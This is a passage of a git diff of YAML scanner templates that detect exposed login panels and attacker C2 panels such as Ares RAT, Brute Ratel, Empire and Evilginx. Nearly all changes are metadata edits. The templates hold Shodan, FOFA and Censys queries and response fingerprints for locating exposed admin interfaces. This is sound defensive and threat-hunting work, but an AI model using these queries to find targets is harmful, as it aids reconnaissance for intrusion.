287c4c310a..9c5494fb58 100644 --- a/http/exposed-panels/bigfix-login.yaml +++ b/http/exposed-panels/bigfix-login.yaml @@ -9,12 +9,11 @@ info: - https://www.hcltechsw.com/bigfix classification: cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:N - cvss-score: 0 cwe-id: CWE-200 metadata: + google-query: intitle:"BigFix" max-request: 1 shodan-query: http.title:"BigFix" - google-query: intitle:"BigFix" tags: panel,bigfix http: @@ -34,5 +33,4 @@ http: - type: status status: - 200 - -# digest: 4b0a00483046022100e0618ec8521575eb899de6f72956eda48a2163bb0a74fd6761de77426bd86584022100bb62334eba5e47b54c84164a334a20eddbd635c6cc40601294b62a629907dc68:922c64590222798bb761d5b6d8e72950 +# digest: 4a0a00473045022100b65e3dfcfcf9e3452781c3af28bb02e13d42cc749c4c36bcb781803222cf770802206e26f87158d27f3ed4d2a4b012d6dae45d2c4f92127f252880064fcabddb7026:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/exposed-panels/bigip-rest-panel.yaml b/http/exposed-panels/bigip-rest-panel.yaml index 2119e1e26b..cc49e1b1c3 100644 --- a/http/exposed-panels/bigip-rest-panel.yaml +++ b/http/exposed-panels/bigip-rest-panel.yaml @@ -12,13 +12,13 @@ info: - https://clouddocs.f5.com/products/big-iq/mgmt-api/v5.4/ApiReferences/bigiq_api_ref/r_auth_login.html classification: cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:N - cvss-score: 0 cwe-id: CWE-200 + cpe: cpe:2.3:a:f5:big-ip_access_policy_manager:*:*:*:*:*:*:*:* metadata: max-request: 1 - vendor: f5 product: big-ip_access_policy_manager shodan-query: http.title:"BIG-IP®-+Redirect" +"Server" + vendor: f5 tags: panel,bigip,f5 http: @@ -36,4 +36,4 @@ http: - type: status status: - 401 -# digest: 4b0a004830460221008aa6e79aa6b3c079500c2dfaa9834721668209393a6ed5ef4d7c8da057fc35700221008339477172abe75a9531d66d29a51c1a9349e42329d27148e43fc0569964a6d6:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4a0a0047304502206764af3b5f83ceb4bd05ce52af8e68efa0979e7592565a63364aacb06c97dbf8022100dd4aadb0f61ba02642e4db9ab5f2af21d3a48b462fd6fda05f279c47a95d09d0:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/exposed-panels/biotime-panel.yaml b/http/exposed-panels/biotime-panel.yaml index 25c21825b5..c5b589e260 100644 --- a/http/exposed-panels/biotime-panel.yaml +++ b/http/exposed-panels/biotime-panel.yaml @@ -7,12 +7,11 @@ info: description: BioTime Web login panel was detected. classification: cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:N - cvss-score: 0 cwe-id: CWE-200 metadata: - verified: true max-request: 2 shodan-query: http.title:"BioTime" + verified: true tags: panel,biotime http: @@ -35,5 +34,4 @@ http: - type: status status: - 200 - -# digest: 490a00463044022058ae602a6e56bd1b23ffc8bec6429db8c36d93c737ca1791a53d5502d3ec3d0d022004bf359c15a4dec843d1176d93575f082499df6cd15fe7be8cdfd1d7c67cd6c9:922c64590222798bb761d5b6d8e72950 +# digest: 4a0a00473045022041c4bf54097a3c06343835d18246d98241fd836a92c9891ce56bf0a2877c6d24022100c1ba12357b9380235a1b4574b3c008c01223ec4a72cec702e0a0b12c7e3a9a5b:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/exposed-panels/bitdefender-gravityzone.yaml b/http/exposed-panels/bitdefender-gravityzone.yaml index 7b960dd346..56ce04d8b4 100644 --- a/http/exposed-panels/bitdefender-gravityzone.yaml +++ b/http/exposed-panels/bitdefender-gravityzone.yaml @@ -7,14 +7,14 @@ info: description: Bitdefender GravityZone panel was detected. classification: cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:N - cvss-score: 0 cwe-id: CWE-200 + cpe: cpe:2.3:a:bitdefender:gravityzone:*:*:*:*:*:*:*:* metadata: - verified: true max-request: 1 - vendor: bitdefender product: gravityzone shodan-query: title:"Bitdefender GravityZone" + vendor: bitdefender + verified: true tags: panel,bitdefender http: @@ -32,4 +32,4 @@ http: - type: status status: - 200 -# digest: 4b0a00483046022100e502e11e00ae67e8f4a26763a88d70c40fcf7633b987843b3f7ed018c2fdcdb2022100c963b421296ea2af93fff7cc1da7e49d1537205b9600df1efdbcdab02c7ab654:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 490a0046304402206be53c1b505d353d82468b722644f5c4c955be8646d69a2151b1ceb3154f3f4f02207c437100098d684db2ce162e5db23d6d24fef3c2a4b0f17f36837729e01a9c25:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/exposed-panels/bitrix-panel.yaml b/http/exposed-panels/bitrix-panel.yaml index 5a5e639306..358de53163 100644 --- a/http/exposed-panels/bitrix-panel.yaml +++ b/http/exposed-panels/bitrix-panel.yaml @@ -7,10 +7,11 @@ info: description: Bitrix24 is a unified work space that places a complete set of business tools into a single, intuitive interface. classification: cwe-id: CWE-200 + cpe: cpe:2.3:a:bitrix:bitrix24:*:*:*:*:*:*:*:* metadata: max-request: 1 - vendor: bitrix product: bitrix24 + vendor: bitrix tags: panel,bitrix,login http: @@ -33,4 +34,4 @@ http: - type: status status: - 200 -# digest: 4a0a004730450220152fb7853a194224ff44cd0a104e531f3873421259abb33ba060af46888d6ae8022100ee704ba906817fcadf851fb922528c517c3101ef868782fb30579b7444256d80:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4b0a00483046022100aed76166bf76788a65dd64db6b0e9852bd233f2edf6c712aa5e0212453007677022100a1805a4a145e8d95695f5f754536f777d3c0a37b4a1867725675ee535755aeef:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/exposed-panels/bitwarden-vault-panel.yaml b/http/exposed-panels/bitwarden-vault-panel.yaml index 90f48aac84..c0f79ca4db 100644 --- a/http/exposed-panels/bitwarden-vault-panel.yaml +++ b/http/exposed-panels/bitwarden-vault-panel.yaml @@ -6,12 +6,14 @@ info: severity: info reference: - https://bitwarden.com/?utm_source=google&utm_medium=cpc&utm_campaign=AW_ALL_NU_CL_Bitwarden_en_GSN_DTMB_Brand-Login_KW:Brand-Login_Consolidated&utm_content=646427936792&utm_term=bitwarden%20vault%20login|kwd-826827349840&hsa_acc=2567950947&hsa_cam=19621984700&hsa_grp=145977914135&hsa_ad=646427936792&hsa_src=g&hsa_tgt=kwd-826827349840&hsa_kw=bitwarden%20vault%20login&hsa_mt=e&hsa_net=adwords&hsa_ver=3&gad=1&gclid=Cj0KCQjwpompBhDZARIsAFD_Fp-07Mni-xzuKd5Ewi6I7qzRTdZOYSxMsMVvKVWhGm5qg2KUiY2Z7SQaAvSIEALw_wcB + classification: + cpe: cpe:2.3:a:bitwarden:bitwarden:*:*:*:*:*:*:*:* metadata: - verified: true max-request: 1 - vendor: bitwarden product: bitwarden shodan-query: title:"Bitwarden Web Vault" + vendor: bitwarden + verified: true tags: panel,bitwarden,vault,detect http: @@ -34,4 +36,4 @@ http: - type: status status: - 200 -# digest: 490a004630440220217bec76e0dc7afdc5da9d769921be1a8850a9b71c4714d5c52791da24dbaf74022067a904e499a6f71ef609c5f54c5825b78fb17a45ef5c20992c8bbeec42169299:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4a0a00473045022100aca06cb2930ef1e0b8f2b3e1978225343e6d79ce69f7c46242018b212bfc15d5022031401800c88ea9431ae7a415edd7b4c0a217e32b30e1b5f06b3b3438192f8099:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/exposed-panels/black-duck-panel.yaml b/http/exposed-panels/black-duck-panel.yaml index 34c8972246..b7abefcc13 100644 --- a/http/exposed-panels/black-duck-panel.yaml +++ b/http/exposed-panels/black-duck-panel.yaml @@ -11,12 +11,11 @@ info: - https://www.synopsys.com/software-integrity/security-testing/software-composition-analysis.html classification: cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:N - cvss-score: 0 cwe-id: CWE-200 metadata: - verified: true max-request: 1 shodan-query: http.title:"Black Duck" + verified: true tags: panel,blackduck,synopsys http: @@ -44,5 +43,4 @@ http: - type: status status: - 200 - -# digest: 4b0a0048304602210094f4eb7be160d7fd7a4b46597775d0f2051a775b6e1d87f7b447c90493429c7c0221008d766029fd26a7d9a4948f75d5a5510d7ca16b261a7a82b0709a3ff68a0a04b0:922c64590222798bb761d5b6d8e72950 +# digest: 4a0a0047304502202ea24e64db385b676ed987956903c076911be347a07531f076856460d2a0efc4022100962cbde46271d1a25366e443128224303444467910f0f6967f61e89725feedc4:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/exposed-panels/bloofoxcms-login-panel.yaml b/http/exposed-panels/bloofoxcms-login-panel.yaml index 6b9e08af7e..c70416ad14 100644 --- a/http/exposed-panels/bloofoxcms-login-panel.yaml +++ b/http/exposed-panels/bloofoxcms-login-panel.yaml @@ -4,12 +4,14 @@ info: name: bloofoxCMS Login Panel - Detect author: theamanrawat severity: info + classification: + cpe: cpe:2.3:a:bloofox:bloofoxcms:*:*:*:*:*:*:*:* metadata: - verified: "true" + fofa-query: Powered by bloofoxCMS max-request: 2 - vendor: bloofox product: bloofoxcms - fofa-query: "Powered by bloofoxCMS" + vendor: bloofox + verified: "true" tags: panel,bloofox,cms http: @@ -37,4 +39,4 @@ http: - type: status status: - 200 -# digest: 4b0a00483046022100bf1f431196f7b9d3904e1906fbd399aead8d7e26da82f4f7f59ea673afec5a8e02210083f435f4ed9a2f279aacbc018b47fb181426e6fb296983938cee252de54fa862:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4a0a0047304502203756982c43b1269b90d14a376c9f0465532699b21984f7be0b087b39eb2a2f38022100a2eded3d7d8c7645fb608e8cb959a8cc08a2139faad81a2173f803ab6728fd96:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/exposed-panels/blue-iris-login.yaml b/http/exposed-panels/blue-iris-login.yaml index 154d0ba968..f6bf07e07b 100644 --- a/http/exposed-panels/blue-iris-login.yaml +++ b/http/exposed-panels/blue-iris-login.yaml @@ -10,7 +10,6 @@ info: - https://blueirissoftware.com/ classification: cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:N - cvss-score: 0 cwe-id: CWE-200 metadata: max-request: 1 @@ -37,5 +36,4 @@ http: group: 1 regex: - 'var bi_version = "(.*)";' - -# digest: 4b0a00483046022100b39c8aa2272e2a5ba6f3e17d7f238c776bef3fee2a72f2bc8ef488494fe1cfcf022100c48a4a0f4b3967dc4784f56642f0ebe9c67796acfd715ce60781b99f31556c69:922c64590222798bb761d5b6d8e72950 +# digest: 4b0a00483046022100d1123cec0f881f5d05e5d5adc300242a66c161da0623bd9e49274ea593b6ca67022100ef8cf9025c294cbd1599f1dbbb2902e03ae1ac6aedeadff5edfff264b688a566:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/exposed-panels/bmc-panel-detect.yaml b/http/exposed-panels/bmc-panel-detect.yaml index edd3d7c9ee..df667f6f85 100644 --- a/http/exposed-panels/bmc-panel-detect.yaml +++ b/http/exposed-panels/bmc-panel-detect.yaml @@ -7,7 +7,6 @@ info: description: BMC Discovery Outpost admin panel was detected. classification: cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:N - cvss-score: 0 cwe-id: CWE-200 metadata: max-request: 1 @@ -23,5 +22,4 @@ http: part: body words: - "BMC Discovery Outpost: Login" - -# digest: 4a0a00473045022056064e72388b9d05172f73f9d626b3ea857609773a091d074030793b45ebabc102210090823353b0524696765350ad262fa295423499aa17dc055cd82961386d9f5617:922c64590222798bb761d5b6d8e72950 +# digest: 4a0a004730450220309c702c95077055ace0a55ef6a9e4a80fe4c7a7ded729b2ab0ec44fd7f654d4022100fc8c43c68f763f7d8f2754c7e4def57445e58e6175445716d2019de0fcfee9b0:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/exposed-panels/bmc/bmc-discovery-panel.yaml b/http/exposed-panels/bmc/bmc-discovery-panel.yaml index c5fb68c7aa..f7a06681ee 100644 --- a/http/exposed-panels/bmc/bmc-discovery-panel.yaml +++ b/http/exposed-panels/bmc/bmc-discovery-panel.yaml @@ -9,12 +9,11 @@ info: - https://docs.bmc.com/docs/discovery/documentation-home-1098837931.html classification: cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:N - cvss-score: 0 cwe-id: CWE-200 metadata: - verified: true max-request: 1 shodan-query: http.title:"BMC Software" + verified: true tags: panel,bmc http: @@ -41,5 +40,4 @@ http: group: 1 regex: - 'Version ([0-9.]+)' - -# digest: 4b0a00483046022100b562275c8e4b9fbef2200291daca66f60d308b09510c44d96562b03df08e724402210080633aaf02dd075b9b68653403052c0dfde34f8b228ffe6e8e28622d500e927e:922c64590222798bb761d5b6d8e72950 +# digest: 490a0046304402202d14fe97a89572e24a09d0dba0c3f5467f7009a8ca73446b8b5e4863f6eb1a0f02203c72c903fcbb2e6b6ca22b54f4db01537db52401dd6cb789320d9e839bc7a92b:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/exposed-panels/bolt-cms-panel.yaml b/http/exposed-panels/bolt-cms-panel.yaml index ab4e1f7332..540b00d09c 100644 --- a/http/exposed-panels/bolt-cms-panel.yaml +++ b/http/exposed-panels/bolt-cms-panel.yaml @@ -9,13 +9,13 @@ info: - https://github.com/bolt/bolt classification: cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:N - cvss-score: 0 cwe-id: CWE-200 + cpe: cpe:2.3:a:boltcms:bolt:*:*:*:*:*:*:*:* metadata: max-request: 1 - vendor: boltcms product: bolt - tags: panel,bolt,cms,login + vendor: boltcms + tags: panel,bolt,cms,login,boltcms http: - method: GET @@ -37,11 +37,12 @@ http: - '' - '' - - 'Bolt requires JavaScript to function properly and continuing without it might corrupt or erase data.' + - 'Bolt requires JavaScript to function properly and continuing without + it might corrupt or erase data.' - 'Bolt » Login' - 'Cookies are required to log on to Bolt. Please allow cookies.' - type: status status: - 200 -# digest: 4a0a00473045022100a62cc1279cc9a563c0c4d768a5f775b7f8df08f4744ea3820ef7c1ad7969756e022053f5137b31c563e0be87f28bc5120f2fe706f786dba33abae5b8e2c5f246ac8e:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4b0a00483046022100d8684f4c1b177c03406b0ec21626ca0f724aeb29eae2f9ab567a9dce7e837fcc022100e992011e055c81ba50abc96b5f8fbb09825502114e29c05d28c119d6f4940b1d:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/exposed-panels/bomgar-login-panel.yaml b/http/exposed-panels/bomgar-login-panel.yaml index 33e4c50f2b..74fb9c70a5 100644 --- a/http/exposed-panels/bomgar-login-panel.yaml +++ b/http/exposed-panels/bomgar-login-panel.yaml @@ -7,7 +7,6 @@ info: description: Bomgar Login panel was detected. classification: cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:N - cvss-score: 0 cwe-id: CWE-200 metadata: max-request: 2 @@ -34,5 +33,4 @@ http: - "status_code==200" - "contains(tolower(body), 'bomgar')" condition: and - -# digest: 4a0a004730450220746180aa6cc631ea66240949a5870a5cf7bbf8896359c63a21a9d6abdaa6886f022100ffd45b3c72f92ed021d26a2eca15ed1c7195442762e1f74cec7a44a2b0940603:922c64590222798bb761d5b6d8e72950 +# digest: 4a0a0047304502201db58bb56449bf41976bcf0ec75494cfaaaae213a05c4bd2e52d2d5a212a732f02210086317042dc5d7dec8c1e81284aa985ba63e20f161eb36355294c27955c12f693:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/exposed-panels/bookstack-panel.yaml b/http/exposed-panels/bookstack-panel.yaml index 5fdd4a9eef..d2e5dc91c6 100644 --- a/http/exposed-panels/bookstack-panel.yaml +++ b/http/exposed-panels/bookstack-panel.yaml @@ -9,14 +9,14 @@ info: - https://github.com/BookStackApp/BookStack classification: cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:N - cvss-score: 0 cwe-id: CWE-200 + cpe: cpe:2.3:a:bookstackapp:bookstack:*:*:*:*:*:*:*:* metadata: max-request: 1 - vendor: bookstackapp product: bookstack shodan-query: http.title:"BookStack" - tags: panel,bookstack + vendor: bookstackapp + tags: panel,bookstack,bookstackapp http: - method: GET @@ -47,4 +47,4 @@ http: group: 1 regex: - '(?:app\.js|(?:print\-)?styles\.css)\?version=([\w\.\-]+)["'']>' -# digest: 4a0a004730450220643cad4a79db59e9ae7f58122abd49984c197e83f553fe1ecd9f2e694d5c5de2022100fc28499a51e2ac3c4167255b399183ffb3a03515e4568b9593565043b6e9430d:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4b0a00483046022100a539d284db0c4dd9737c31c3a9fb379e836a46646c6cff2a33b241c823c96c60022100c53b3a54a862556d553ab1571c96f1d7bd6eb079c5640497cfe273200a3bd61c:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/exposed-panels/buddy-panel.yaml b/http/exposed-panels/buddy-panel.yaml index 45a8ff3a50..d868a2436c 100644 --- a/http/exposed-panels/buddy-panel.yaml +++ b/http/exposed-panels/buddy-panel.yaml @@ -9,7 +9,6 @@ info: - https://buddy.works classification: cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:N - cvss-score: 0 cwe-id: CWE-200 metadata: max-request: 1 @@ -36,5 +35,4 @@ http: - type: status status: - 200 - -# digest: 4a0a0047304502206bda56286ba92c87a43894489884535011bff27921817face75e97db9434363b022100f0c7eb6e068236ad88d63fe595cff35d0101fb9acbef214d54228b1064844cbc:922c64590222798bb761d5b6d8e72950 +# digest: 4a0a0047304502205f9710d971630cd061314411a185645657c93dc6f60e4896f7673f73f0bda21e022100af16bd5ab094e2528f8480956abc8e3a5efee5ab459dbd73aafb71ead5ed072b:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/exposed-panels/buildbot-panel.yaml b/http/exposed-panels/buildbot-panel.yaml index f6e74891bb..6fd9dc497e 100644 --- a/http/exposed-panels/buildbot-panel.yaml +++ b/http/exposed-panels/buildbot-panel.yaml @@ -9,14 +9,14 @@ info: - https://buildbot.net classification: cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:N - cvss-score: 0 cwe-id: CWE-200 + cpe: cpe:2.3:a:buildbot:buildbot:*:*:*:*:*:*:*:* metadata: - verified: true max-request: 1 - vendor: buildbot product: buildbot shodan-query: http.title:"BuildBot" + vendor: buildbot + verified: true tags: panel,buildbot,cicd http: @@ -45,4 +45,4 @@ http: part: body regex: - '\[\"Buildbot\", \"([0-9.]+)\"\]' -# digest: 4b0a00483046022100af8373b7616d1234a1427ef4873031b7b888d0bed8870afb9a8ce63333aeb0a8022100b34577e5ec8db3c0239f03f114b4c02173af73cf780041823b6cd7fc47f9fcf1:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 490a0046304402202b4838278ef1da25a98701864436665c8650f5faf42d8ee3aad3f2cd1d1096d502206fc9f344bb9c2536b0803c91ed15323b30f9dc1e8398936fde98b6068c9b331e:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/exposed-panels/bynder-panel.yaml b/http/exposed-panels/bynder-panel.yaml index 08dde7db71..9d72dff4bd 100644 --- a/http/exposed-panels/bynder-panel.yaml +++ b/http/exposed-panels/bynder-panel.yaml @@ -9,9 +9,9 @@ info: reference: - https://www.bynder.com/en/ metadata: - verified: true max-request: 1 shodan-query: http.favicon.hash:1017650009 + verified: true tags: panel,bynder,login,detect http: @@ -32,4 +32,4 @@ http: group: 1 regex: - 'http-equiv="version"\s+content="([0-9\.]+)"' -# digest: 4a0a00473045022100807e81f332adedece7a78e7423c2c79aa4694491936b6ce6ef890fd3ee21af3302201fa5c99cd1190b16d8c367f3a18f91fa6451b88488fe6f1056f55e0058df9708:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4b0a00483046022100b5cc6f8bf28e8c01adecf1b54e1b5edb9810b58c6ccda55c5f6e3fe6fac3ac76022100e19df4227b127b06f178bd511254477e09fab706884b929bbf708c197f075c66:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/exposed-panels/c2/ares-rat-c2.yaml b/http/exposed-panels/c2/ares-rat-c2.yaml index 8ca7ebdf52..71aa6b7939 100644 --- a/http/exposed-panels/c2/ares-rat-c2.yaml +++ b/http/exposed-panels/c2/ares-rat-c2.yaml @@ -9,9 +9,9 @@ info: reference: - https://github.com/montysecurity/C2-Tracker/blob/main/tracker.py metadata: - verified: true max-request: 1 shodan-query: product:'Ares RAT C2' + verified: true tags: c2,ir,osint,ares,panel,rat http: @@ -31,4 +31,4 @@ http: - type: status status: - 200 -# digest: 4a0a0047304502207a7e63617d7be81cd8f853fe522d84270bb42a7121463df540c249d80b7eca79022100fd4678816bee7837766b5a4fa98fe1538e8cccfc6e3f9a2d1fbae1e337e94694:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4b0a004830460221009f391bde1caab637dadd216cedd223a7fcec59ffb58278a87a7a5c88e89f3844022100ad24450fff2f2fcc52d87582f0159aa5ca5f4e3694ffc3f6c63918444eb7d2d2:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/exposed-panels/c2/brute-ratel-c4.yaml b/http/exposed-panels/c2/brute-ratel-c4.yaml index 9afe6eac55..31e53afd96 100644 --- a/http/exposed-panels/c2/brute-ratel-c4.yaml +++ b/http/exposed-panels/c2/brute-ratel-c4.yaml @@ -9,9 +9,9 @@ info: reference: - https://bruteratel.com/ metadata: - verified: "true" max-request: 1 shodan-query: http.html_hash:-1957161625 + verified: "true" tags: c2,bruteratel,c4,panel http: @@ -26,5 +26,4 @@ http: - "contains(body, '404 file not found')" - "(\"1a279f5df4103743b823ec2a6a08436fdf63fe30\" == sha1(body))" condition: and - -# digest: 4b0a00483046022100f1de6c8fc069d57399f23b476ebd8fde21a41cc0fca5a4e9fda765aafeccca65022100e512bc56582dc79f22dac73f5f25806c6ce6ff5f287b6ed3c7d5c52dd44d6c24:922c64590222798bb761d5b6d8e72950 +# digest: 4a0a00473045022100f66117aa613792028cebcc42d9db7423777d88c444b4dab2d52ee783d39d2291022067a0b3b9824bc202ed2a5056841e91cc65a0aa445f612969de96486ad0cbe181:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/exposed-panels/c2/caldera-c2.yaml b/http/exposed-panels/c2/caldera-c2.yaml index a3350a28c7..d8092dae1d 100644 --- a/http/exposed-panels/c2/caldera-c2.yaml +++ b/http/exposed-panels/c2/caldera-c2.yaml @@ -10,9 +10,9 @@ info: - https://github.com/mitre/caldera - https://github.com/montysecurity/C2-Tracker/blob/main/tracker.py metadata: - verified: true - max-request: 1 fofa-query: http.favicon.hash:-636718605 + max-request: 1 + verified: true tags: c2,ir,osint,caldera,panel http: @@ -30,4 +30,4 @@ http: - type: status status: - 200 -# digest: 4a0a004730450221008ff94687ae1b013643001b71a2043b8bb5aba89b88023d073e9bf9d2378b2dc402202bdb2ed3c0f17da110f0afeecbb6388d8938446c7503c7b8e104cbbd103276bd:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4a0a00473045022100e1b48b33f9e658a431608ef7e5e0bf2a65ac9b8318e308275b2118098ac7323002202dc01ffbd25675e08406159da6ce180546948f024dee7060f888bf0ab94df06e:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/exposed-panels/c2/covenant-c2.yaml b/http/exposed-panels/c2/covenant-c2.yaml index ce14509ea2..3321d610c8 100644 --- a/http/exposed-panels/c2/covenant-c2.yaml +++ b/http/exposed-panels/c2/covenant-c2.yaml @@ -9,9 +9,9 @@ info: reference: | https://www.socinvestigation.com/shodan-filters-to-hunt-adversaries-infrastructure-and-c2/ metadata: - verified: true max-request: 1 shodan-query: ssl:”Covenant” http.component:”Blazor” + verified: true tags: c2,ir,osint,covenant,panel http: @@ -29,5 +29,4 @@ http: - type: status status: - 200 - -# digest: 4a0a00473045022034aab8fff68f4b747abc30d0d9ba3840e74b9b155725898b5081a4af5a3631e4022100edf989b89caef2caf4a01540f5cfc7634725a17fa283843871b33cbd9895b988:922c64590222798bb761d5b6d8e72950 +# digest: 4a0a00473045022100b187174c24f50ffdb1c8238284b465a9e97891282087de49629a4dfd0314614402204835b7ac9cbb38517294dbb37098f51a8ba69901c98ab64d1b471acf96ed762f:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/exposed-panels/c2/deimos-c2.yaml b/http/exposed-panels/c2/deimos-c2.yaml index 3692baf796..ec42a53d8f 100644 --- a/http/exposed-panels/c2/deimos-c2.yaml +++ b/http/exposed-panels/c2/deimos-c2.yaml @@ -9,9 +9,9 @@ info: reference: | https://twitter.com/MichalKoczwara/status/1551632627387473920 metadata: - verified: true max-request: 1 shodan-query: http.html_hash:-14029177 + verified: true tags: c2,ir,osint,deimosc2,panel http: @@ -29,5 +29,4 @@ http: - type: status status: - 200 - -# digest: 4a0a00473045022100afaee4052a21e5c8252b20d37927869765b5640a2b43e24fb727e7bf2081541a0220282f88158f74082532392173f2a031c8ba7760d4151a23c6a2a65af76b655e4d:922c64590222798bb761d5b6d8e72950 +# digest: 4b0a00483046022100f8f988797806487c3954f68ba5190d3c2bd039426b06c57e24f8fb50aa54ace5022100963c074463fb72e56b9770e9b208995ba0870bcbb2caa791a6cf7dde8f942baa:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/exposed-panels/c2/empire-c2.yaml b/http/exposed-panels/c2/empire-c2.yaml index b9149a2fbc..33aa844a71 100644 --- a/http/exposed-panels/c2/empire-c2.yaml +++ b/http/exposed-panels/c2/empire-c2.yaml @@ -10,9 +10,9 @@ info: - https://github.com/thehappydinoa/awesome-censys-queries#security-applications - https://bc-security.gitbook.io/empire-wiki/ metadata: - verified: "true" - max-request: 1 censys-query: bc517bf173440dad15b99a051389fadc366d5df2 || dcb32e6256459d3660fdc90e4c79e95a921841cc + max-request: 1 + verified: "true" tags: c2,ir,osint,empire,panel http: @@ -24,5 +24,4 @@ http: - type: dsl dsl: - "(\"dcb32e6256459d3660fdc90e4c79e95a921841cc\" == sha1(body))" - -# digest: 490a0046304402200d609b87d55b23de84d183209f2715d91aee8f2df64415837c8b1b4de725cf99022048f63f0ab4e46d257859d5d5f3bda2271cf1ee153e0f864de26c4c995928806a:922c64590222798bb761d5b6d8e72950 +# digest: 4a0a0047304502204272b0e3e53274ba1d2c28bf3b44ad0945eda9eed8289b6aa5c764a9cb9e6ca8022100964e9d3e83038cadd2a57742e65cc085a6159c9c575ce477dd57749ca658bcea:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/exposed-panels/c2/evilginx.yaml b/http/exposed-panels/c2/evilginx.yaml index 74ae582a72..33fe9927d3 100644 --- a/http/exposed-panels/c2/evilginx.yaml +++ b/http/exposed-panels/c2/evilginx.yaml @@ -9,9 +9,9 @@ info: reference: - https://dmcxblue.gitbook.io/red-team-notes-2-0/red-team-infrastructure/delivery/evilginx metadata: - verified: "true" - max-request: 1 censys-query: b18d778b4e4b6bf1fd5b2d790c941270145a6a6d + max-request: 1 + verified: "true" tags: tech,evilginx,c2,phishing,panel http: @@ -26,5 +26,4 @@ http: - "status_code == 200 && contains(body, 'Evilginx')" - "(\"b18d778b4e4b6bf1fd5b2d790c941270145a6a6d\" == sha1(body))" condition: and - -# digest: 4b0a0048304602210086c300a42ce7e075464da6e689d064e98091cb3750731529b7ad943e449437f2022100cbdf7b0298905fff382e5cd42e55d694294e9a06ae5b947cea0b2f125052fe99:922c64590222798bb761d5b6d8e72950 +# digest: 4a0a00473045022100b054d578c96330ba422da33cffeda19ec169680fd610d9fa3901220a1c4be42f022066ae1460859829e4bd3c2c9fa225379aca75366998df8de19fa6403990b8147c:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/exposed-panels/c2/hack5-cloud-c2.yaml b/http/exposed-panels/c2/hack5-cloud-c2.yaml index 49cb2a8dae..3a591b9c05 100644 --- a/http/exposed-panels/c2/hack5-cloud-c2.yaml +++ b/http/exposed-panels/c2/hack5-cloud-c2.yaml @@ -9,9 +9,9 @@ info: reference: - https://twitter.com/fofabot/status/1742737671037091854 metadata: - verified: true - max-request: 1 fofa-query: app="Hak5-C2" + max-request: 1 + verified: true tags: c2,ir,osint,hack5c2,panel http: @@ -29,4 +29,4 @@ http: - type: status status: - 200 -# digest: 4a0a00473045022100c8fd1bc76ba8ef353399f0de6cd0e09930fc44481808d29eb0e3bb1910365b540220279652266852667d683caf75fd39444c45dfae3a5bc5b90e3bc0a26d315b26d2:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 490a00463044022023d3630d9d342f93264fc99afdd5678dea442db11cc19985526791f1e77f41ec0220628ae099dd06959f4e6df500639870f72e1de3db53ef1b9d08b62f72fe357a4c:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/exposed-panels/c2/hookbot-rat.yaml b/http/exposed-panels/c2/hookbot-rat.yaml index 4565860bc7..b5859c0e76 100644 --- a/http/exposed-panels/c2/hookbot-rat.yaml +++ b/http/exposed-panels/c2/hookbot-rat.yaml @@ -7,9 +7,9 @@ info: 